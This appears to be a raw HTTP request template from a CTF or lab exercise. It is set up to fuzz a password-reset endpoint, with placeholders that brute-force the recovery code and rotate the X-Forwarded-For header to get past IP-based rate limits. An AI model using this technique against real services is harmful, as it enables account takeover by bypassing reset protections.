POST /reset_password.php HTTP/1.1
Host: 10.49.155.181:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://10.49.155.181:1337
Connection: keep-alive
Referer: http://10.49.155.181:1337/reset_password.php
Cookie: PHPSESSID=atkojt6c88imqgs98g5c0k4ibs
Upgrade-Insecure-Requests: 1
Priority: u=0, i
X-Forwarded-For: FUZZIP 

recovery_code=FUZZCODE&s=172
